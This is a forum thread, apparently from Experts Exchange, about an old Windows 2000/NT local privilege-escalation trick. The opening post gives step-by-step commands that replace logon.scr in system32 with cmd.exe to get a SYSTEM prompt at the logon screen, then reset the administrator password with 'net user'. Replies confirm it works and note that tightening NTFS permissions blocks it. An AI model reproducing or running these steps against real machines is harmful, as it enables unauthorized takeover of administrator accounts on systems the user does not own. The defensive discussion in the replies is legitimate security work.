i have a new exploit for you all to figure a way round

This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author:Will W.

 
wirehead203Asked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

MSGeekCommented:
To clarify, you are looking for a way around this exploit?  It does not even sond like you are sure it works?
0
craigtinCommented:
I think you answer your own question.  If you allow full permisson to the system folders for users why do you care if they can rename a file?
0
MSGeekCommented:
By the way, this exploit does work.  
0
Top Threats of Q1 & How to Defend Against Them

WEBINAR: Join WatchGuard CTO and our Threat Research Team on Aug. 2nd to hear the findings from our Q1 Internet Security Report! Learn more about the top threats detected in the first quarter and how you can defend your business against them!

MSGeekCommented:
By the way, this exploit does work.  
0
craigtinCommented:
even if you restrict users rights on the folders?
Then the command prompt must be using system privilage.
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
MSGeekCommented:
If you change NTFS rights so they cannot del and copy (rename) the file your ok.  This will not work with default security settings for normal users in XP.  But it does in 2000 and 2000 Server
0
CleanupPingCommented:
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
MSGeekCommented:
wirehead.. how'd you make out with this.  MSGeek.
0
MSGeekCommented:
Thanks Modulo.  MSGeek
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
OS Security

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.